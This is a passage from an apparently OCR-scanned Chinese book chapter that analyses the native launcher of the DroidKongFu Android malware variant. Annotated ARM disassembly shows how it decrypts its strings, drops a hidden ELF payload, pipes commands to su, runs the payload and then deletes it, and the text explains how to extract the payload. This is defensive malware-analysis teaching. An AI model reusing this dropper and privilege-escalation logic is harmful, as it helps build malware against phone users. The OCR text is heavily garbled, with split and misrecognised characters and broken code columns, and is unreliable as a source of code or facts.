.text:00000B30 MOV R8，R2 ; 以 下 4 行 恢 复 R8~R11 寄 存 器 

.text:00000B32 MOV R9, R3 

.text:00000B34 MOV R10, R4 

.text:00000B36 MOV R11, R5 

.text:00000B38 POP (RA-R7, PC) ; 恢复 R4~R7 寄 存 器 ， 函 数 返 回 


上 面 的 代码 片断 保留 了 函数 的 开头 与 结尾 部 分 。 笔 者 打算 在 本 小 节 中 
讲解 一 下 函数 执行 现场 〈 执 行 现 场 指 的 是 处 理 器 执行 到 该 函数 时 各 寄存 器 
的 值 ) 的 保护 与 恢复 ， 后 面 小 节 中 其 它 荡 数 的 头 尾 部 分 与 此 都 大 同 小 异 ， 
笔者 将 不 再 花 时 间 对 其 进行 介绍 。 另 外 ， 注 意 上 面 的 注释 采用 的 是 分 号 “;” 
开头 ， 这 是 IDA Pro 中 使 用 的 注释 方法 ， 自 己 手工 编写 ARM 汇 编 代码 时 ， 添 
es 人 用 Qe. 


注意 


分 析 Native 层 的 代码 除了 需要 熟悉 ARM 指 令 集 外 ， 还 需要 读者 对 Linux 系 统 中 的 API 函 数 有 所 了 
解 ， 笔 者 在 分 析 病 毒 代码 时 ， 不 会 对 Linux 系 统 的 API 函 数 功 能 进行 介绍 ， 如 果 读 者 对 此 不 太 熟 悉 ， 


可 以 阅读 其 它 Linux 编 程 书籍 ， 或 者 直接 在 搜索 引擎 中 搜索 相关 API 钞 数 的 参数 及 用 途 。 


在 前 面 章 节 的 学 习 中 我 们 知道 ， 寄 存 器 R0~R3 是 函数 的 前 4 个 参数 寡 存 
器 ， 超 过 4 个 参数 的 函数 调用 使 用 堆栈 来 传递 ， 在 静态 分 析 原 生 程序 时 ， 我 
们 无 法 得 知 寄存 器 在 某 一 点 时 的 值 ， 因 此 大 脑 中 时 刻 要 记 住 这 4 个 寄存 器 所 
代表 的 具体 参数 ， 最 好 的 方法 就 是 在 寄存 器 赋值 的 语句 上 添加 注释 加 以 说 
明 。 另 外 ， 寄 存 器 R4~~R11 为 通用 寄存 器 ， 每 一 次 函数 调用 都 可 能 改变 它们 
中 一 个 或 多 个 的 值 ， 因 此 ， 在 使 用 它们 前 需要 先 保 存 它们 的 值 ， 以 便 不 影 
响 到 六 数 调 用 时 的 中 间 结 果 。PDatamit0 国 数 保 存 图 数 执行 现场 的 代码 如 
下 : 


PUSH (RA-R7,LR) ; 将 R4-R7 寄 存 器 以 及 LR 寄存 器 的 值 压 入 堆栈 
MOV R7, R11 ; 以 下 4 行 保 存 寄 存 器 R8-R11 

MOV R6, R10 

MOV R5, R9 

MOV RA, R8 

PUSH (RA-R7) ; 将 R8-R11 寄 存 器 的 值 压 入 堆栈 

LDR RA, =0xFFFFFDE4 ; -0x21c 

ADD SP，R4 ; 开辟 栈 空间 


R4 人 ~R11 共 8 个 寄存 器 ， 分 2 次 庄 入 了 堆栈 。 这 样 的 寄存 器 保护 方法 在 分 
析 其 它 原 生 方法 时 经 常见 到 。 保 护 完 寄存 器 后 就 是 开辟 栈 空 间 ， 栈 空间 是 
用 来 做 什么 的 ? 从 编程 的 角度 出 发 ， 每 个 函数 或 多 或 少 都 使 用 到 了 临时 变 
量 ， 这 些 变量 是 怎么 存储 到 程序 中 的 呢 ? 答案 就 是 这 个 栈 空 间 了 。 编译 器 
在 编译 程序 代码 时 ， 计 算 所 有 临时 变量 占用 的 空间 大 小 并 以 4 字 节 对 齐 取 整 
(不 同 编译 器 的 计算 方法 可 能 有 所 不 同 ) ， 然 后 在 函数 代码 开头 插入 类 似 
“ADD SP, <- 空 已 太 小 >” 的 指令 ， 所 有 变量 的 读 写 操作 都 是 在 “SP- 空 名 大 小 
”~ SP 之 间 的 存储 单元 中 完成 。 

本 实例 开辟 栈 空间 的 代码 是 “ADD SP, R4”，R4 被 指定 为 一 个 负数 
0xFFFFFDE4， 它 的 值 就 是 -0x21c， 因 此 ， 以 下 两 行 代 码 也 可 以 达到 同样 的 
效果 。 


MOV R4, $0x21c 
SUB SP, R4 


在 阔 数 执行 完 返 回 时 需要 恢复 原先 寄存 器 的 值 ， 代 码 如 下 : 


MOVS R3, 0x21C ; 栈 空 间 大 小 

ADD SP, R3 ; 恢复 SP 寄存 器 的 值 

POP (R2-R5) ; 将 R8~R11 寄 存 器 的 值 恢 复 到 R2~R5 寄 存 器 中 
MOV R8，R2 ; 以 下 4 行 恢 复 R8~R11 寄 存 器 

MOV R9，R3 

MOV R10，R4 

MOV R11, R5 

POP (RA-R7, PC) SMKERA-R7WP (£38. PRAES 


函数 执行 现场 的 保存 与 恢复 是 截然 相反 的 两 个 操作 ， 这 些 代 码 在 分 析 
Android 原 生 程序 时 随处 可 见 ， 因 此 读者 必须 要 理解 其 具体 含义 。 
在 保护 完 寄存 器 的 值 后 ， 是 如 下 的 代码 : 


LDR R4, -( GLOBAL OFFSET TABLE  - 0x95A) ; R4 作 为 数据 存 取 的 基 址 =0x10c8 
ADD RA, PC 

LDR R3, [R4,R3] ; Oxi0cB8B4*0x5c = 0x1124 = Stack chk guard ptr 
STR R3, [SP,40x214] ;保存 R3 寄 存 器 ， 用 于 堆栈 完整 性 检查 


间 令 “LDR R3, [R4,R3]” 执 行 后 R3 寄 存 器 的 值 为 0x10c8+0x5c = 0x1124, 
此 处 存放 的 是 一 个 _ stack chk guard ptr 指 针 ， 该 指针 指向 
__stack_chk_guard， 那 这 个 _stack_chk_guard 又 是 个 什么 东西 ? 其 实 它 是 
gcc 编 译 器 的 堆栈 保护 技术 (GCC Stack Smashing Protector) 的 一 部 分 ， 软 
件 安全 技术 中 有 一 种 攻击 方式 叫 堆栈 浇 出 ， 这 种 攻击 方式 表现 为 : 程序 受 
到 攻击 后 ， 堆 栈 被 填充 为 一 些 精 心 构造 的 恶意 数据 ， 函 数 在 返回 时 由 于 寄 
存 器 的 值 遭 到 算 改 从 而 跳 转 执 行 恶 意 代码 。 为 了 防止 这 种 攻击 ，gcc 编 译 器 
提供 了 -fstack-protector-all 选 项 ， 当 编译 程序 时 加 上 该 选项 ， 生 成 的 代码 就 
会 被 添加 上 堆栈 保护 代码 ， 其 中 之 一 便 是 stack_chk_guard o 
. stack_chk_guard 并 不 是 什么 神奇 的 东西 ， 它 只 是 一 个 void 类 型 的 指针 。 在 
Android 系 统 源码 的 bioniclibc\bionic\ssp.c 文 件 中 可 以 看 到 其 实现 机 制 。 它 的 


值 是 由 guard_setup0 国 数 设置 的 ， 其 值 是 由 /dewurandom 设 备 生 成 的 一 个 
随机 数 。 

上 面 的 代码 读 取 了 __stack_chk_guard 的 值 并 将 它 保存 到 SP 寄存 器 相对 
偏 移 0x214 的 人 位置， 我们 再 看 看 函 arum 时 相应 的 处 理 代 码 : 


goreturn CODE XREF: .text:0000099613j 
; .text:00000B42Fj 
MOV R2, R9 ; 读 取 原先 保存 的 R3 寄 存 器 的 值 
LDR R3, [R4,R2] ; 读 取 原先 __stack_chk_guard_ptr 的 值 
LDR R2, [SP,40x214] ; 恢复 保存 的 寄存 器 R3 的 值 到 寄存 器 R2 中 
LDR R3, [R3] ; 读 取 原先 __stack_chk_guard 的 值 
CMP R2, R3 ; 判断 堆栈 上 __stack_chk_guard 的 值 是 否 变 化 
BNE checkstackfail ; 堆栈 检查 失败 


sss 


疯 数 返回 时 重新 读 取 堆 栈 上 0x214 处 的 值 并 与 原先 _ stack_chk_guard 的 
值 进 行 比较 ， 如 果 两 个 值 不 相同 ， 说 明 堆 栈 此 时 已 经 不 “纯洁 ”> 了， 这 个 时 
候 就 会 跳 转 到 checkstackfail 处 去 执行 ， 该 处 主要 调用 了 gcc 编 译 器 插入 的 
. stack_chk_fail0 孙 数 ， 该 函数 是 一 个 扫尾 孜 数 ， 有 具体 的 工作 是 阻塞 程序 中 
所 有 的 信号 处 理 器 、 输 出 堆栈 错误 信息 ， 最 后 中 止 进程 运行 。 
介绍 完 函 数 执行 现场 保护 与 堆栈 保护 后 ， 正 式 进 入 病毒 功能 代码 分 
析 。 
1. 功能 字符 串 解 密 
当 堆 栈 保护 设置 完毕 后 ，DataInit() 调 用 了 init_predata() 闵 数 ， 该 水 数 主 
要 完成 字符 串 数据 的 解密 ,“ 狭 狂 ” 的 病毒 作者 将 程序 中 所 有 使 用 到 的 字符 
串 都 进行 了 加 密 ， 在 程序 运行 时 动态 的 解密 ， 下 面 我 们 来 看 看 这 个 解密 上 子 
数 : 


.text:00000894 init predata ; 该 函数 解密 6 小 段 字 符 串 


.text:00000894 LDR R1, -( GLOBAL OFFSET TABLE  - 0x89C) ;R1 指 向 GOT 首 
地 址 

.text:00000896 LDR R3, =(_ data start ptr - 0x10C8) ;R31Hly data. 
start ptr 

.text:00000898 ADD R1, PC 

.text:0000089A LDR R3, [R1,R3] 

.text:0000089C LDRB R2, [R3] ; 取 1 个 字 节 的 数据 

.text:0000089E CMP R2, #0 ; 不 为 0 就 进行 循环 解密 

.text:000008A0 BEQ loc. BAE 

.text:000008A2 

.text:000008A2 decryptl1 ; CODE XREF: init predata+18|j 
.text:000008A2 . MVNS R2, R2 ; FURR 

.text:000008A4 STRB R2, [R3] ; 重新 写 回 去 

.text:000008A6 ADDS R3, di ; 移动 指针 

.text:000008A8 LDRB R2, [R3] ; 取 下 一 个 字 节 

.text:000008AA CMP R2, #0 ; 循环 判断 

.text:000008AC BNE decrypti ; 第 一 处 的 8c 9a 93 99 解 密 后 为 73 65 6c 66, 
.text:000008AC ; 也 就 是 字符 串 self。 

.text:000008AC ; 下 面 decryptx 都 是 采用 同样 的 解密 手法 
.text:000008AE 

.text:000008AE loc 8AE ; CODE XREF: init predata-*C|j 
.text:000008AE LDR R3, -(SYS BIN SU ptr - 0x10C8) 

.text:000008B0 LDR R3, [R1,R3] 

decrypt6 ; CODE XREF: init predata-86|j 

.text:0000091A BNE decrypt6 ; 解密 后 的 字符 串 为 0.bot .ch 
.text:0000091C BX LR ;函数 返回 


代码 第 1 行将 GOT 的 首 地址 赋 给 了 R1 寄 存 器 ， 第 2 一 4 行 获取 data start 
加 密 字 符 串 的 地 址 ， 第 5 行 的 “LDRB R2, [R3]? 读 取 1 个 字 节 ， 如 果 不 为 0 就 进 
入 decryptl 标 号 处 开始 循环 解密 ， 整 个 解密 的 过 程 简单 到 了 “单薄 ”， 只 有 一 
行 天 键 代 码 *MVNS R2, R2”， 作 用 是 对 字 节 取 反 ， 然 后 下 一 行 “STRB R2, 
[R3]” 将 解密 后 的 数据 写 回 去 。 

接 下 来 我 们 动手 还 原 加 密 字符 串 ， 笔 者 在 此 使 用 了 C 代 码 +ARM 汇 编 代 
码 的 方式 编写 了 一 个 小 程序 来 完成 解密 ， 具 体 的 代码 读者 可 以 参看 本 书 配 
套 源 代码 的 本 小 节 的 decrypt 工 程 源码 。IDA Pro 支 持 通 过 编写 脚本 的 方式 来 
扩展 静态 分 析 功 能 ， 如 编写 代码 解密 脚本 ， 这 样 大 大 地 方便 了 分 析 人 员 ， 


笔者 在 网 上 找到 了 另外 一 个 分 析 人 员 编 写 的 LeNa 病 毒 (实际 为 DroidKongFu 
变种 病毒 ) 相应 的 字符 串 解 密 脚 本 ， 和 下 载 地 址 为 
https://github.com/strazzere/LeNa-Decryption-Script。 具 体 的 使 用 方法 是 点 击 
IDA Pro 菜 单项 “File Script file”， 选 择 下 载 的 LeNa-decryption.idc 脚 本 文 
件 ， 然 后 将 鼠标 定位 到 需要 解密 的 字符 串 所 在 的 行 ， 如 __data_start_ptr 所 在 
的 行 (笔者 本 机 位 于 0x113c 文 件 偏 移 处 ) ， 按 下 键盘 上 的 斜 枉 *”， 此 时 解 
密 脚 本 便 会 运行 ， 并 会 将 解密 后 的 字符 串 以 注释 的 方式 添加 到 字符 串 交 叉 
引用 处 《交叉 引用 的 含义 以 及 如 何 通过 交叉 引用 定位 函数 调用 ， 可 以 参看 
《IDA Pro 权 威 指南 》 一 书 ) ， 程 序 中 共 使 用 到 了 6 行 字符 串 ， 这 些 字 符 串 
解密 后 的 效果 如 图 12-9 所 示 。 


~ 


IDA - /home/feicong/virus/lib/armeabi/libvadgo.so 
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Function name : 120 PROP RUNNING ID ptr DCD PROP RUNNING ID E: t 
di access 120 Decrypted val 27e:  rC.bot.id 
L£] strlen 124 stack chk guard ptr DCD — stack chk guarc 

mJ 123  bindata ptr DCD _ bindata 

^| open 12C CMD SET PROP ptr DCD CMD SET PROP DATA XREF: init precata448fr 
[f| close 12C LE EN emt 

di init predata 130 PROP RUNNING CH p-r DCD PROP RUNNTNG CH A Tate 
(f|. imp popen 130 t 

= 130 Le ch 
di —imp. pclose 134 SYS BIN SU ptr DCD SYS BIN SU A t 
[£|. aeabi unwind cpp. 134 t 

m " 134 De m/ Dir 
ra —imp. sleep 138 SYS XBIN SU ptr DCD SYS XBIN SU DA 2fr 
[f] _imp_fflush 138 t 

ral " 138 De m/ xb 
Fi —imp. stack chk f. 13C | data start ptr DCD data start DA +6fr 
[f] _imp_chmod 13 t 

(f| imp write Mae 

: not found 

= - 二 一 
(E| Output window 回 | | 四 
Decryprea string: /System/D1r/sSetp-op 


12-9 ”使用 LeNa-decryption 脚 本 解密 字符 串 


至 此 ， 功 能 字符 串 的 解密 就 介绍 完了 。 
2. 释放 病毒 主体 
init_predata() 遂 数 执 行 完 后 ， 执 行 了 以 下 4 行 代码 : 


.text:0000099C MOV R2, R10 ;判断 Java 代 码 传递 过 来 的 元 数据 字符 串 是 和 否 为 空 


.text:0000099E CMP R2, #0 
.text:000009A0 BNE extractelf ; 释放 病毒 主体 
.text:000009A2 B SetR10 ; 如 果 R10 为 0 则 设置 R10 为 “self” 字 符 串 地 址 


R10 寄 存 器 是 Java 代 码 传递 过 来 的 元 数据 字符 串 ， 取 值 为 MYAD_PID 的 
“NCuttherope”， 因 此 下 面 的 BNE 跳 转 会 成 功 ， 如 果 这 里 传 入 字符 串 为 空 ， 
则 会 跳 转 到 setR10 处 执行 ， 功 能 是 设置 R10 寄 存 器 的 值 为 解密 后 的 “self" 字 符 
串 ， 设 置 完成 后 同样 会 跳 转 到 extractelf 标 号 处 执行 病毒 体 的 释放 工作 ， 
extractelf 标 号 处 的 代码 如 下 : 


.text:000009A4 extractelf ; CODE XREF: .text:000009A01! j 
.text:000009A4 ; .text:00000B5A|j 
.text:000009A4 ADD R6, SP, #0x14 

.text:000009A6 MOVS R2, 40x80 


.text:000009A8 . MOVS R1, #0 ; H0 

.text:000009AA LSLS R2, R2, 41; 要 填 入 的 长 度 0x80*2 = 0x100 
.text:000009AC MOVS RO, R6 ; 缓冲 区 

.text:000009AE BLX memset ; 清空 一 个 存储 空间 用 来 存 入 sprintf 组 成 的 字符 串 
.text:000009B2 ADD RO, SP, #0x10 

.text:000009B4  BLX time ; 获取 系统 时 间作 为 随机 种 子 

.text:000009B8 LDR RO, [SP,#0x10] 

.text:000009BA BLX srand48 


.text:000009BE BLX lrand48 ; 生成 的 随机 数 作为 释放 的 恶意 程序 的 文件 名 
.text:000009C2 LDR R1, -(aSS eDd - 0x9CC) 

.text:000009C4 LDR R2, -(aDataData - Ox9CE) 

.text:000009C6 STR RO, [SP] 


.text:000009C8 ADD R1, PC ; "$s/S$s/.e&dd" 
.text:000009CA ADD R2, PC ; "/data/data" 
.text:000009CC | MOVS RO, R6 ”前面 nemset 的 缓冲 区 
.text:000009CE MOVS R3, R5 ; 程序 包 名 
.text:000009D0 BLX sprintf ; 构造 字符 串 


/data/data/com.tebs3.cuttherope/.e 随 机 数 a 
.text:000009D4 MOVS R2, $0xCO 


.text:000009D6 MOVS RO, R6 ; 文件 名 

.text:000009D8 LDR R1, =0x242 ; flag 

.text:000009DA LSLS R2, R2, #1 

.text:000009DC BLX open ; 创建 恶意 文件 

.text:000009E0 SUBS R7, RO, #0 ; 文件 fa 

.text:000009E2 BGE loc 9E6 ; 创建 成 功 

.text:000009E4 B gounlink 

.text:000009E6 1oc 9E6 ; CODE XREF: .text:000009E2!j 
.text:000009E6 LDR R3, =0x60 ; 相对 GoT 表 的 偏 移 
.text:000009E8 MOVS R0, R7 ; 文件 fa 

.text:000009EA LDR R1, [RA4,R3] ; 0x10c8«0x60 = 0x1128- _ bindata ptr 
.text:000009EC LDR R3, -( bindata«0x5808) ; 文件 的 长 度 为 0x699c = 27036571 
.text:000009EE MOVS R2, R3 ; 写 入 的 长 度 

.text:000009F0 MOV R8, R3 

.text:000009F2 BLX write ; 写 入 恶意 文件 

.text:000009F6 MOVS R5, RO ; 实际 写 入 的 长 度 

.text:000009F8 MOVS RO, R7 ; 文件 fa 

.text:000009FA BLX close ; 关闭 文件 

.text:000009FE BLX sync ; 强制 刷新 

.text:00000A02 BLX sync ; 强制 刷新 

.text:00000A06 ”MOVS RO, R6 ; 文件 名 

.text:00000A08 LDR R1, =0X1ED s 255u 

.text:00000A0A BLX chmod ; 加 上 可 执行 权限 

.text:00000A0E CMP R5, R8 ; 比较 写 入 的 长 度 是 否 正 确 
.text:00000A10 BEQ accesssu ; 相对 GOT 表 的 偏 移 


.text:00000A12 B gounlink 


代码 首先 在 0x9AE 行 调用 memsetO 国 数 填 0 了 一 块 内 存 区 域 ， 这 块 区 域 
用 来 存 入 将 要 生成 的 随机 病毒 文件 名 。time0 函 数 用 来 获取 系统 时 间 ， 这 里 
用 它 作为 生成 文件 名 的 随机 种 子 ， 接 下 来 调用 了 lrand480 函 数 生 成 随机 数 ， 
病毒 在 生成 随机 文件 名 时 采用 “.e< 随 机 数 >d” 的 方式 命名 ， 文 件 名 最 前 面 加 
上 了 点 “.”， 这 样 生 成 的 文件 即 为 隐藏 文件 ， 因 此 直接 通过 DDMS 是 无 法 看 
到 病毒 文件 的 ， 需 要 在 adb shell 下 通过 “1s -a” 进 行 查看 。 使 用 sprintf 构 造 好 完 
整 的 病毒 文件 路 径 后 ， 调 用 open() 闵 数 创建 了 病毒 文件 ， 接 着 调用 write() 孙 
数 写 文件 ， 写 的 内 容 的 起 始 地 址 为 ”bindata_ptr， 该 指针 指向 _bindata (X 
件 偏 移 为 0x1194) ， 在 IDA Pro 中 跳 转 到 该 地 址 进行 查看 ， 发 现 此 处 开始 的 
前 4 个 字 节 为 “7F 45 4C 46”， 这 不 正 是 Android 原 生 文 件 的 有 效 标识 吗 ? ! 再 
看 写 入 的 长 度 : _ bindata (0x1194) + 0x5808 = 0x699c = 27036 字 节 。 文 件 
写 完 后 依次 是 closeO) 国 数 关闭 文件 、sync0 函 数 强 制 刷 新 、chmod0 函 数 添加 
执行 权限 ， 整 个 过 程 简单 而 不 需要 额外 的 解释 。 

病毒 发 作 后 ， 在 adb shell 下 通过 “ls -a” 依 然 无 法 找到 生成 的 病毒 主体 ， 
其 实 往 下 继续 分 析 就 会 知道 ， 病 毒 外 壳 在 执行 完 主 体 后 就 调用 unlink() 遂 数 
将 其 删除 了 ! 因此 ， 我 们 要 想 分 析 病 毒 主体 ， 还 得 手工 将 它 dump 下 来 。 从 
上 面 的 分 析 中 ， 我 们 知道 了 起 始 地 址 为 0x1194， 文 件 大 小 为 27036 字 节 ， 手 
工 提 取 文 件 就 很 简单 了 。 使 用 Bless Hex Editor 工 具 打 开 libvadgo.so 文 件 ， 在 
0x1194 处 点 击 一 下 鼠标 ， 然 后 往 下 拖 动 Bless Hex Editor 右 侧 的 滚动 条 ， 当 
0x7b30(0x1194+0x699c ) 处 的 内 容 在 可 视 范 围 内 时 ， 按 下 SHIFT 键 ， 点 击 
0x7b30 所 在 的 文件 偏 移 处 ， 将 0x1194~0x7b30 之 间 的 所 有 内 容 选 中 ， 然 后 
在 选中 的 内 容 上 点 击 右键 选择 复制 ， 如 图 12-10 所 示 。 


/home/Feicong/tools/DroidBox23/libvadgo.so - Bless 


Le m E AEB aQ 
libvadgo.so 3€ | 
00007a34 00 


) 
) 
00 00 0C 0 00 00 z 0 0 00 0 pex DbIOI Desc StEN XM 
00007p30|00 00 00 00 00 47 43 43 3A 20 28 47 4E 55 29 20 34 2E|..... SCC: (GNU) 4. 
47 


00007b42|34 2E 33 00 00 43 43 3A 20 28 47 4E 55 29 20 34 2E|4.3..SCC: (GNU) a-| 
Offset: |0x1194 | VGotooffset % 
Signed 8 bit: [o | Signed 32 bit: lo | Hexadecimal: | 00 00 0000 | * 
Unsigned 8 bit: |0 | Ursigned 32bit: |0 | Decimal: |000000000000 | 
Signed 16 bit: |o | Float 32 bit: |o | Octal: |000000000000 | 
Unsigned 16 bit: |0 | Float 64 bit: |2.30742243413123E-317 | Binary: |00000000 00000000 00 
[C] show little endian decoding [| Show unsigned as hexadecimal ASCII Text: | 
Offset: 075460/ 077257 Selection: 010624 to 075457 (064634... INS 


图 12-10 “使 用 Bless Hex Editor 提 取 病 毒 主体 


点 击 Bless Hex Editor 工 具 栏 上 的 “New File” 按 钮 ， 在 打开 的 新 建文 件 页 
面 中 上 点击 右键 选择 粘贴 ， 然 后 点 击 *Save File” 按 钮 保存 文件 ， 命 名 为 
evil.bino 

3。 开 启 su 权 限 管道 

病毒 主体 释放 完成 后 就 是 开启 su 权限 的 管道 了 。 它 的 代码 如 下 : 


.text:00000A14 accesssu ; CODE XREF: .text:00000A101 j 

.text:00000A14 LDR R3, -0x6C ; 相对 GoT 表 的 偏 移 

.text:00000A16 MOVS R1, #0 

.text:00000A18 LDR R5, [R4,R3] ; 0x10c840x6c = 0x1134 = SYS BIN SU ptr 

.text:00000A1A MOVS RO, R5 

.text:00000A1C BLX access ; 判断 /system/bin/su 是 否 可 以 访问 

.text:00000A20 CMP RO, #0 ; 返回 0 表示 检测 成 功 

.text:00000A22 BEO popensu ; 文件 可 访问 就 popen ("/system/bin/su", w) 

.text:00000A24 B gopopensu ; 文件 不 可 访问 就 popen("/system/xbin/ 
gu"; Py") 

.text:00000A26 


.text:00000A26 popensu ; CODE XREF: .text:00000A221 j 
.text:00000A26 LDR R1, -(aW - OxA2E) 

.text:00000A28 MOVS RO, R5 

.text:00000A2A ADD R1, PC ; "wt 

.text:00000A2C BLX popen ; 创建 管道 运行 /system/bin/su 
.text:00000A30 ADDS R7, RO, #0 ; R7-RO 

.text:00000A32 

.text:00000A32 loc A32 ; CODE XREF: .text:00000B52[j 
.text:00000A32 CMP R7, #0 ; 判断 popen 是 否 执行 成 功 
.text:00000A34 BNE runcommand 

.text:00000A36 B gounlink 


这 段 代 码 很 简单 ， 主 要 是 通过 access0) 冰 数 判断 su 可 执行 程序 的 路 径 ， 
su 是 系统 权限 提升 程序 ， 一 般 Android 手 机 出 厂 后 不 会 保留 此 文件 ， 因 此 ， 
此 处 的 病毒 得 以 继续 运行 的 前 提 是 手机 设备 已 经 ROOT (通常 拥有 su 程序 的 
系统 意味 着 设备 已 经 ROOT) ， 检 测 完 su 的 文件 路 径 后 ， 调 用 popen() 遂 数 创 
建 了 一 个 管道 ， 如 果 系 统 中 拥有 su 权限 管理 程序 ， 此 时 会 弹出 权限 请 求 对 
话 框 。 接 下 来 程序 判断 管道 是 否 创 建成 功 ， 如 果 成 功 就 uncommand 来 执行 
病毒 本 体 ， 反 之 ， 则 跳 转 到 gounlink 标 号 处 删除 病毒 本 体 后 退出 函数 。 

4. 执行 病毒 主体 

这 是 Native 层 外 壳 的 最 后 一 项 工作 了 ， 那 就 是 让 病毒 主体 “发 作 ”。 相 应 
的 代码 比较 长 ， 笔 者 将 其 精 减 后 帖 出 关键 部 分 代码 如 下 : 


EIL 


:00000A50 
:00000A52 
:00000A54 
:00000A56 
:00000A58 
:00000A5A 
:00000A5C 
:00000A5E 
:00000A62 


:00000A64 
:00000A68 
:00000A6A 
:00000A6C 
:00000A6E 
:00000A70 
:00000A74 
:00000A76 


STR 
LDR 
MOV 
STR 
LDR 
LDR 
MOVS 
BLX 
MOVS 


BLX 
MOVS 
MOVS 
MOVS 
MOVS 
BLX 
MOVS 
BLX 


:00000A38 runcommand 


R3, [SP,s*0xC] 
R3, 20x58 

R1, R8 

R2, [SP] 

R3, [R4,R3] 
R2, [SP,#0xC] 
RO, R5 
sprintf 

RO, R5 
strlen 

R3, R7 

R2, RO 

R1, #1 

RO, R5 
fwrite 

RO, R7 
fflush 


; CODE XREF: 


.text:00000A341 j 


; THE "/system/bin/setprop" 

; 相对 GoT 表 的 偏 移 

; 格式 字符 串 “g%s $s %s\n” 

; 第 5 个 参数 压 入 堆栈 R11=Android_ID 


PROP RUNNING ID ptr (r0.bot.id) 
/system/bin/setprop 


; 缓冲 区 
; 构造 字符 串 


"/system/bin/setprop r0.bot.id 
android idMn" 


; 计算 组 合 后 的 字符 串 长 度 
; 管道 fd 

; 要 写 入 的 字符 串 长 度 

; 按 字 节 计算 

; 要 写 入 的 命令 

; 写 入 命令 到 管道 

; 管道 fd 

; 强制 刷新 


:00000A8C 
:00000A8E 
:00000A90 
:00000A92 
:00000A96 


:00000ABA 
:00000ABC 
:00000ABE 
:00000ACO 
:00000AC4 
:00000AC6 
:00000ACA 
:00000ACC 
:00000ACE 
:00000AD0 
:00000AD2 
:00000AE6 
:00000AE8 
:00000AEA 
:00000AEC 
:00000AEE 
:00000AF0 
:00000AFA4 
:00000AF6 
:00000AF8 
:00000AFA 
:00000AFC 
:00000B00 
:00000B02 
.text:00000B06 
:00000B08 
:00000B0C 
:00000B10 
:00000B14 
:00000B16 
:00000B1A 


MOVS 
MOVS 
MOVS 
MOVS 
BLX 
MOVS 
BLX 
MOVS 
BLX 
MOVS 
BLX 
MOVS 
BLX 
MOVS 


R1, [SP] 

RO, R5 ; 
R1, R8 ; 
sprintf 

R0, R5 ; 
R2, R6 ; 
RO, R5 ; 
R1, PC ; 
sprintf ; 
RO, R5 

strlen : 
R3, R7 ; 
R2, RO ; 
R1, #1 

RO, R5 ; 
fwrite F 
R3, z0x74697865 
RO, R5 

R3, [SP,f0x114] 
R3, #0xA 

R3, [R5, #4] 
strlen 

R1, #1 

R2, RO 

R3, R7 

RO, R5 

fwrite 

RO, R7 

fflush 

RO, R7 

pclose 

RO, 300 

sleep 

RO, R6 

unlink 

RO, #1 


; 第 5 个 参数 压 入 堆栈 R1 = "NCuttherope" 


缓冲 区 
WATIE “$s $s $sWn" 


"/system/bin/setprop r0.bot.ch 
NCuttherope\n" 


生成 的 恶意 文件 名 
缓冲 区 
" Ss\n" 


恶意 文件 完整 路 径 


计算 文件 名 长 度 
管道 fa 
文件 名 长 度 


要 写 入 的 命令 就 是 恶意 文件 的 完整 路 径 
执行 恶意 文件 


; "tixe (exit 命令) " 


换行 符 


写 入 换行 符 
长 度 应 该 是 5 个 字 节 


~. ~ 


管道 fda 


执行 exit 


强制 刷新 


关闭 管道 


睡眠 300 毫 秒 
生成 的 恶意 文件 
删除 文件 


整个 runcommand 往 su 管道 写 入 了 4 次 命令 ， 第 1 次 是 “/system/bin/setprop 
r0.bot.id android idvn”， 这 个 r0.bot.id 是 病毒 为 感染 后 的 手机 设置 的 一 个 ID 


值 ， 取 值 为 Java 层 代码 传 进来 的 Android 设 备 ID。 第 2 次 写 入 su 管道 的 命令 是 
“/system/bin/setprop r0.bot.ch NCuttheropenm”， 具 体 作 用 不 详 。 第 3 次 是 执行 
病毒 主体 文件 ， 至 于 病毒 主体 具体 做 了 什么 ， 我 们 将 在 下 一 小 节 进 行 分 
析 。 第 4 次 是 执行 “exit*。 命 令 写 入 完成 后 调用 sleep() 遂 数 睡眠 300 毫 秒 ， 最 
后 调用 unlink0O 函 数 删除 病毒 主体 文件 ， 这 也 是 为 什么 使 用 "ls -a” 也 无 法 找到 
病毒 主体 的 原因 ， 从 这 里 看 得 出 ， 病 毒 作者 真 可 谓 是 “用 心 恨 苦 ”。 

执行 完 病 毒 主体 ， 就 是 goretum 国 数 返 回 部 分 了 ， 它 的 代码 我 们 上 面 已 
经 分 析 过 了 。 至 此 ，Native 层 的 病毒 启动 代码 就 分 析 完 了 。 详 细 的 代码 注释 
读者 可 以 使 用 IDA Pro 导 入 本 小 节 提 供 的 libvadgo.idc 脚 本 进行 查看 ， 具 体 使 
用 方法 是 : 点 击 IDA Pro 菜 单项 “File- Script file”， 然 后 选择 libvadgo.idc 文 
件 ， 此 时 IDA Pro 窗 口中 的 反 汇编 代码 会 自动 完成 注释 。 


12.4.3 ”Native 层 病毒 核心 分 析 


在 上 一 小 节 中 ， 笔 者 花 了 大 量 的 篇 幅 介 绍 了 DroidKongFu 变 种 病毒 的 启 
动 代码 ， 并 对 每 一 行 代码 都 添加 了 详细 的 注释 ， 这 样 做 的 目的 是 为 了 让 读 
者 能 够 真正 地 看 懂 每 一 条 汇编 指令 ， 了 解 每 一 行 汇编 代码 的 含义 。Native 层 
的 病毒 与 Java 层 的 病毒 不 同 ， 前 者 由 于 缺少 高 效 的 分 析 工 具 (虽然 可 以 购买 
使 用 IDA Pro 的 ARM Decompiler 插 件 ， 但 价格 非常 昂贵 ) ， 使 得 分 析 工 作 异 
党 艰难 。 本 小 节 将 要 分 析 的 病毒 主体 比 上 一 小 节 的 启动 代码 内 容 要 多 得 
多 ，libvadgo.so 文 件 的 大 小 为 32432 字 节 ， 而 提取 出 来 的 evil.bin 就 占 了 27036 
字 节 。 

病毒 的 主体 主要 完成 了 功能 字符 串 解密 、 设 置 感染 标志 、 感 染 系 统 文 
件 、 获 取 远 程 指 令 、 执 行 控制 命令 等 操作 。 本 小 节 将 通过 静态 与 动态 相 结 
合 的 方法 来 对 其 进行 分 析 。 

DroidKongFu 变 种 病毒 兴风作浪 已 经 有 些 时 日 了 ， 随 着 它 的 曝光 ， 现 在 
病毒 的 远程 服务 器 已 经 无 法 访问 ， 运 行 安装 virus.apk， 病 毒 也 无 法 直接 感染 
手机 系统 文件 了 〈( 话 哩 如此， 为 了 保险 起 见 ， 读 者 切 勿 直接 在 手机 中 安装 
运行 ) ， 因 此 ， 还 需要 我 们 来 手动 地 感染 该 病毒 。 感 染 的 方法 很 简单 ， 将 


